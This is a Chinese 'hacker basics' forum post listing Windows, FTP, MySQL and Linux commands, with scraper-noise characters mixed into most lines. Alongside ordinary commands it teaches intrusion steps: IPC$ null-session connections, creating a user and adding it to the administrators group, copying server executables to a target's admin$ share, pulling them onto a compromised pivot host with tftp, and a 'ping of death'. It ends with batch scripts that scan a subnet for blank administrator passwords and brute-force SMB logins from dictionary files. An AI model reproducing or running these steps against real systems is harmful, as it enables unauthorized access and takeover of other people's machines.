黑客基础--最全的DOS命令 黑客基础, 最全的, DOS命令

admin

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接
! }! A9 _* ?" W. |, |3 l3 \net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接
: k( ?1 {  r  J/ T( R- Jnet use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:
) M) W" C, v  u- qnet use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H:
3 |5 m9 q% Z9 A$ ^% S1 nnet use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接
! H" Q4 |( G/ H5 }  @net use h: /del 删除映射对方到本地的为H:的映射   j3 Y' [; G$ _1 r9 P2 X  G5 @0 ^; [
net user 用户名　密码　/add 建立用户
3 H8 \9 [: b% v; A0 o, |net user guest /active:yes 激活guest用户
( t% V  `; J0 [' Gnet user 查看有哪些用户
* j% a$ a& D1 Fnet user 帐户名 查看帐户的属性
# F2 z7 ?) z( f6 t, o" H3 Enet localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数
3 v3 j2 S  K7 |/ Ynet start 查看开启了哪些服务
3 G& W: H# I+ Q9 g* s" F2 Q2 f) wnet start 服务名　 开启服务；(如:net start telnet， net start schedule)
) d1 H+ m: G( h4 Q) F* i0 qnet stop 服务名 停止某服务 4 I) o0 c: s5 h5 e; U' @
net time \\目标ip 查看对方时间 2 p$ |' C- Y# {, w4 a7 [0 J( x8 [
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 " `/ W  j9 ?$ [: W7 d7 }& ?
net view 查看本地局域网内开启了哪些共享
! R3 e$ S  p2 I5 s4 anet view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享 4 e+ h, O) U* P7 F' H6 ^, k* n
net config 显示系统网络设置
; ^  [' t8 i  Y! I, F3 P& L& f* @& Pnet logoff 断开连接的共享 & K" `  t  @! `- A* k8 `1 i" s
net pause 服务名 暂停某服务
$ t* u# K5 j+ y7 s' Onet send ip "文本信息" 向对方发信息 ( o" S/ q, B# P7 C7 u3 w
net ver 局域网内正在使用的网络连接类型和信息 1 a' {+ R( y! x3 O& o/ t, B1 B& r
net share 查看本地开启的共享
4 V# w2 k: M8 hnet share ipc$ 开启ipc$共享
- r& g- H- @& a1 \1 Onet share ipc$ /del 删除ipc$共享 1 R- Q: W% p  F) j5 i
net share c$ /del 删除C：共享
! s# m4 u9 i- `; O* T* {( jnet user guest 12345 用guest用户登陆后用将密码改为12345 & N# B: D. @3 l3 _) N5 S& Y! H
net password 密码 更改系统登陆密码 ( M- q$ {9 W) ~2 ]  A( }' y) S3 y; c
netstat -a 查看开启了哪些端口,常用netstat -an * B5 I+ M1 H8 j3 S; H' ^8 ]; w
netstat -n 查看端口的网络连接情况，常用netstat -an + {! o5 B' I& ?7 t
netstat -v 查看正在进行的工作 . s6 m/ z* Y7 {5 g, i. D
netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况） 7 Z) \* O& j2 X: f+ A1 u
netstat -s 查看正在使用的所有协议使用情况 $ Y- n1 D& h8 Z* f! x, t" V) |& e% V
nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写
. s5 |9 j, f; stracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。
) }0 H6 o" x$ c  K, qping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。
' {0 j" x8 `; a) Q/ |8 Tping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
8 O1 H# L0 Z9 H: ?& f/ dipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息 9 u' G, H  }# ~; d; Y4 B) g' `
tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) 7 L& h' K: z" |
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
! k$ I, ?+ F4 x/ I& g5 l; ydel -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
/ k/ ~1 [. \) ?del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同） % g  B/ W5 @9 K7 \  n4 E
move 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 2 x$ F) O! `6 x5 K& c
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令 0 R8 W$ s9 r8 v! x2 e- i/ P
at id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务   ]8 h& k) n* u4 X! n( Y4 ~
at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止 ' T( T0 Q" G  u+ q% U
at id号 /delete 停止某个已注册的计划任务
8 q4 o) ?' M) I7 y1 t' cat 查看所有的计划任务
/ u' j; e. }+ R9 Eat [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 9 j7 n" F) T' J" H7 e
finger username @host 查看最近有哪些用户登陆 " q' s8 S! n$ ~4 u: t; a
telnet ip 端口 远和登陆服务器,默认端口为23
& E. v& R% _) {. k/ v: copen ip 连接到IP（属telnet登陆后的命令）
( o1 [- U" |  f+ y% h) W1 dtelnet 在本机上直接键入telnet 将进入本机的telnet
% v. Y! C6 i5 d1 m& T" N3 @copy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件 3 X4 s0 `: \% y1 \* x2 }
copy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下
4 O2 H& W& j/ x3 \0 Zcppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件
3 N% o8 E2 Z2 W& F3 M; B& wcopy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C： 3 h- n* @* {. J/ U5 ^7 t/ ~
xcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件 0 a3 r. J. ^0 `$ B: |5 b
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送 / G9 c9 E2 t( G1 M
tftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机 . f5 Q0 O  ]$ S  k9 E
ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)
: c4 b  u5 w( Sroute print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface
# E6 S0 f  W9 F, I8 tarp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 : u1 }' H: [3 g" d! I2 N
start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令 + ~& n* H3 Z% S# l, _" Q
mem 查看cpu使用情况
+ d& R8 x' k  b" g- ?attrib 文件名(目录名) 查看某文件（目录）的属性
  ?# n$ Z& w% M; _) M% Kattrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性 $ S8 c" F  Z/ P/ G) r
dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间 1 X8 n$ a* }1 }! r' M
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间 : }$ G: r4 Z1 R1 E- d* F- b4 M
set 指定环境变量名称=要指派给变量的字符 设置环境变量 4 X: ~4 i3 v  o( o# y& E" R* v
set 显示当前所有的环境变量 ( J+ j' S( V& |% R& x- _3 r
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
! ]8 T+ r0 _# \7 M* V, rpause 暂停批处理程序，并显示出：请按任意键继续....
" W1 [$ j8 E3 h" x: e2 Jif 在批处理程序中执行条件处理（更多说明见if命令及变量）
: H8 _) G9 `  L" Agoto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）
! G! v$ l6 R. x! Z1 W  y2 f) _6 o+ X! Ycall 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）
! j5 R+ u1 Y2 Z' ~( Vfor 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）
" @  R- b7 Y+ Aecho on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置 1 E7 Y6 k+ l4 }: p% z( l; y% B
echo 信息 在屏幕上显示出信息 ( ~+ P) ~, H4 }. ?2 z
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中
2 a: k/ P/ e& V3 Y/ O  Hfindstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello ) h' z7 t6 a* I  b
find 文件名 查找某文件
- d/ Z# l' x/ l" y6 n5 o2 gtitle 标题名字 更改CMD窗口标题名字 / _. ^2 {: F7 n& q& @
color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白 4 g( H5 K" `+ G; M+ G1 y4 r
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )
& @) _# W. ^6 s$ @print 文件名 打印文本文件 ) m8 k& N. A( M5 A6 m' P
ver 在DOS窗口下显示版本信息
, Z; P9 |- _/ }winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）
( U5 ?0 g+ G- z5 t+ ~format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS * M9 Q8 q5 @8 y( N$ w
md　目录名 创建目录
3 K0 o) Z8 R4 S" T: a. `) ^replace 源文件　要替换文件的目录 替换文件
% W, {3 ?" J9 mren 原文件名　新文件名 重命名文件名 ; B1 y  g# R" B) h3 E: ~! R
tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称
) K8 s2 C0 r" w( Jtype 文件名 显示文本文件的内容
! `  C5 ]7 t2 N& A1 J* |% Xmore 文件名 逐屏显示输出文件 ' ^/ ~! J$ `1 E
doskey 要锁定的命令＝字符
6 z& F8 t/ f/ Z3 _doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=
& ^% i: p; l# _' [2 u; }! k4 ?* p% Z0 Htaskmgr 调出任务管理器 6 x' Y5 A0 y$ f8 x* f; i9 X
chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误 9 y' s. i3 k( r
tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口 , d8 |9 o/ s& C7 ~9 H& o/ W
exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe
) s  H- T, }* G4 h: X$ mpath 路径\可执行文件的文件名 为可执行文件设置一个路径。
5 W5 h/ U! g2 k- ?8 scmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?
7 ~7 [' W" m  v* U& nregedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；
) q. r% N& u  Y. \/ @. ]5 \regedit /e 注册表文件名 导出注册表 4 `8 I9 G$ v+ B3 q5 p; V- N
cacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。 % _1 z7 _! o* i3 B! a# b  J0 A
cacls 文件名 查看文件的访问用户权限列表
% O1 h6 `3 l8 t) v, ]& W# \* wREM 文本内容 在批处理文件中添加注解 ' r+ ^  |6 T' [8 J' M
netsh 查看或更改本地网络配置情况! l, A/ q( \5 C& I1 F
IIS服务命令：
6 ]% Z# W) y8 i9 R- d, n! _9 Kiisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现） . G! C$ R6 Y  ~9 ?1 d4 B/ }, _2 C
iisreset /start或stop 启动（停止）所有Internet服务
3 m+ ]) e- f0 f" J+ Niisreset /restart 停止然后重新启动所有Internet服务
+ Q8 |1 s8 R% A- P6 |iisreset /status 显示所有Internet服务状态
2 ^/ z$ B7 x) b2 Y/ Eiisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动
4 l6 Y' n: b/ P& x& c7 A  \iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机
2 q1 `! v% i* A  ^. C) M8 Aiisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务
" U5 J% G7 E# [( Z% L6 Z, niisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。 . ?- h) K% J, f( @4 i! T, t* a' ^
FTP 命令： (后面有详细说明内容)
  J5 |. H( Q% L' O; Vftp的命令行格式为:
# H1 g3 R0 K) _0 N7 @1 Z7 h$ g8 t$ ]ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。
0 g) s/ P- h( R－d 使用调试方式。
- O  M$ N' N1 b. R/ D4 K－n 限制ftp的自动登录,即不使用.netrc文件。
4 z0 _/ R1 I4 L: J－g 取消全局文件名。 ( H- ^, {" E" b# O0 a$ o
help [命令] 或 ？[命令] 查看命令说明
. E% T/ X3 N, e' @; rbye 或 quit 终止主机FTP进程,并退出FTP管理方式. & ]4 j6 @  T7 L; S
pwd 列出当前远端主机目录 7 A' G0 z9 S* @( n% s7 J
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
/ T( p1 _% m& W, S6 }9 o! V/ Pget 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中 : \" z3 E8 p( a# A1 |
mget [remote-files] 从远端主机接收一批文件至本地主机
8 B, A* m! n1 U& K7 t9 _" ]mput local-files 将本地主机中一批文件传送至远端主机
' a2 s, M7 d; ]( N/ Adir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
% ~: f  U) P% J% A% q3 n2 cascii 设定以ASCII方式传送文件(缺省值) 7 D& _+ f2 W" k4 i" w- i- o2 L
bin 或 image 设定以二进制方式传送文件
7 @5 w. C/ n0 ^  S- O1 }0 s& v  cbell 每完成一次文件传送,报警提示 $ E- S/ ~! x4 w
cdup 返回上一级目录 % Y- m  I; B# F+ z
close 中断与远程服务器的ftp会话(与open对应) ' g7 X4 D1 E( f* R# {/ x5 l# {
open host[port] 建立指定ftp服务器连接,可指定连接端口
3 H! m3 b; V$ N/ ~delete 删除远端主机中的文件 2 Q+ w8 d: x+ d! ?  V( j
mdelete [remote-files] 删除一批文件 7 f' o6 R! y8 b9 z; W8 m
mkdir directory-name 在远端主机中建立目录 ( S0 g& b! M: }6 P0 x
rename [from] [to] 改变远端主机中的文件名 - R; b0 m* i9 t" {& Y
rmdir directory-name 删除远端主机中的目录 " I0 e8 |* W; @
status 显示当前FTP的状态
3 r6 k" |3 c+ ]; y$ N- `. ~system 显示远端主机系统类型
( R2 `+ I* a% ^1 b: s: B6 xuser user-name [password] [account] 重新以别的用户名登录远端主机
- ]  I$ D) h; J/ N, gopen host [port] 重新建立一个新的连接
/ ~$ a& ~4 e* d0 M1 {- I0 P. Oprompt 交互提示模式
: S: h+ v2 S) ^3 f' U1 q) xmacdef 定义宏命令
' x2 F9 e6 H2 g; v( I, @6 Klcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录 - K: a: ~& V3 f4 n  }' g' ^0 w
chmod 改变远端主机的文件权限
3 j8 E/ ]. s, F* `! Z2 Tcase 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
' Z$ u9 ^% O7 n* P7 f) D1 {; q% Lcd remote－dir 进入远程主机目录
( Z, n1 J" ]1 I0 Hcdup 进入远程主机目录的父目录 / k: }& z4 Z: B4 I
! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip 2 v0 x- t8 P% h% m& i9 X
MYSQL 命令：
, x1 U+ P! T, l' ~* I: Bmysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。) Z* V% v7 ~6 d. H
（例：mysql -h110.110.110.110 -Uroot -P123456
, j) p* b7 d# S' b- n注:u与root可以不用加空格，其它也一样）
: O$ ?0 L' X  ^0 \# A6 kexit 退出MYSQL
/ Q# f* m4 [3 Umysqladmin -u用户名 -p旧密码 password 新密码 修改密码
' {# [. v  ]* Q+ B7 Fgrant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符）
3 |  s+ s7 u$ f, `show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。 $ J- V- |, W3 t. t5 N
use mysql；
  G1 Q, C! k6 O3 yshow tables; 显示库中的数据表
7 l! i% a# J9 kdescribe 表名; 显示数据表的结构 2 t) c9 j6 ^/ D6 r
create database 库名; 建库 0 R( {4 J- _) i3 q3 B7 U
use 库名；
6 R; J' p7 s  |8 s' R4 Q) |create table 表名 (字段设定列表)； 建表
% M+ a% X' v/ a9 ^1 ~! bdrop database 库名; 8 k: m5 ^2 z) {
drop table 表名； 删库和删表
6 ]; |3 A% M6 W4 F9 `delete from 表名; 将表中记录清空 0 h! Q4 g) O, i  ?: [& S/ }* X$ \
select * from 表名; 显示表中的记录
) ~1 F( x* P+ {0 bmysqldump --opt school>school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。 . D5 S: s5 t% L) A. ^- B
win2003系统下新增命令（实用部份）：
' X0 m4 e, Z/ N1 |" Y" y1 Xshutdown /参数 关闭或重启本地或远程主机。' i5 l& h/ L) C, ^! r
参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。% B7 F" c0 t1 Y9 k& e9 X: g) i% I0 Q
例：shutdown /r /t 0 立即重启本地主机（无延时） : f7 b- y/ {0 u* o: e3 o* n* l6 q1 D
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。( _$ ~/ A' M: S: p/ G# A
参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。
0 P9 o! |4 T9 g( `; W. ^6 F& Ftasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。/ W. z; d6 E! F# C1 j
参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程
3 y2 N/ e4 a8 ?- Y* m/ e5 JLinux系统下基本命令： 要区分大小写
  Q- l& Y! x; i! Funame 显示版本信息（同win2K的 ver） * k+ ], a+ A- e# e, J
dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir） ; T6 C1 n3 K# M& _2 Z( z$ z
pwd 查询当前所在的目录位置
9 F/ l2 v  F+ ?4 P8 r6 m6 `+ N+ V2 Wcd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。
7 j* ?6 g) `' H% q# Gcat 文件名 查看文件内容
! K' g% ~( g: Vcat >abc.txt 往abc.txt文件中写上内容。
$ E! J5 E$ Z' B6 r, u9 S! smore 文件名 以一页一页的方式显示一个文本文件。   v: W+ p7 E- W2 g% k/ A
cp 复制文件 / g! Q' B1 ~/ A- S/ V9 `
mv 移动文件 9 I( ?) i0 z9 {
rm 文件名 删除文件，rm -a 目录名删除目录及子目录 5 L* d" D3 i1 c3 O
mkdir 目录名 建立目录
9 C! l/ v% I' W" T; Irmdir 删除子目录，目录内没有文档。
6 \% F8 K. j# H8 Y6 Fchmod 设定档案或目录的存取权限 * v( Q; |) M% C
grep 在档案中查找字符串
7 i7 i& ]3 q2 v7 z/ M* tdiff 档案文件比较 2 H( K( A% O2 a0 ]3 a
find 档案搜寻
7 {6 {. h1 w4 K3 M: }( idate 现在的日期、时间
2 x% V! p$ `' \& a# |who 查询目前和你使用同一台机器的人以及Login时间地点
7 A1 t- W7 _7 L/ t- u$ H/ L3 s8 pw 查询目前上机者的详细资料
8 N( m1 @9 g: o- Mwhoami 查看自己的帐号名称 ) D7 E' n+ O% u- q
groups 查看某人的Group , L1 S  Q, w6 S+ u- R% b( X
passwd 更改密码 ( H! |" ~  d: V- \! p
history 查看自己下过的命令
: j6 u: L; s6 Bps 显示进程状态 ! e7 u! [0 }! O6 q' p9 ?
kill 停止某进程 . s; C5 C! Y4 r! r) U
gcc 黑客通常用它来编译C语言写的文件 & D' G/ {( }* c( e. p' ~! \  e
su 权限转换为指定使用者 * z0 F7 ]) ]  A- ^$ w  h/ T5 j
telnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。
) {- L! i; ~; ^7 tftp ftp连接上某服务器（同win2K
$ x# ?  t$ p% P  ?+ {! L附：批处理命令与变量
6 A5 i- ~- a, C  V1：for命令及变量 基本格式：
) Q, R  B$ `0 ]- A# y) YFOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。1 _  Y4 I1 f  h! [8 p) ~# N
批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%3& l* _; l$ j- H
(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}# G3 s6 y. ^9 a
command：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开
% u: B+ k1 Z9 L! x. kcommand_parameters：为特定命令指定参数或命令行开关9 J, q3 Q" i3 ?, D' k
IN (set)：指在(set)中取值；DO command ：指执行command
) ]. `; o5 s% n  [. Z& U# W' r参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。 * J2 S- F; H9 R' [/ ]3 G
用法举例：
/ s: P7 P- t+ v2 P@echo off
( z8 m% y9 g6 ~3 ~- Fecho 用法格式：test.bat *.*.* > test.txt ! p, C$ u. H% `9 z1 ~5 K
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt
  c$ B( s5 ?) u存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。* C: q+ {9 `/ G* H# t2 G7 C
/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。
/ p) T3 v: c8 X( H" X1 E4 }@echo off - n; l+ j- d% J. d% S
echo 用法格式：ok.bat ip
" C" e- |  m, p% B1 T7 p# b) dFOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
" x& O( H2 ~% l- y8 p+ }存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。
: y7 S8 Y) E, |% m$ E2：if命令及变量 基本格式： 0 ~9 e: Q6 L% w# W+ q
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。3 z+ d( T+ E8 w; d* v1 e
例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。; o# Z6 {2 z! {4 `: O8 C
0 指发现并成功执行（真）；1 指没有发现、没执行（假）。   @3 P( D) s4 {' I9 @) v# c$ O
IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。) Y! K4 _! _8 w
例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "）
$ [3 B* ~: f# }% {, ~IF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。
5 i$ G; }: Z; ^2 ~$ Z4 t例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。 - t( R8 A' l; x) ]/ }6 Y3 e  H
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”